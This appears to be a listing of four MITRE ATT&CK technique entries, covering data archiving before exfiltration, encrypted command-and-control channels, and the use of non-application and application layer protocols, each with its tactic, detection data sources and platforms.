Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre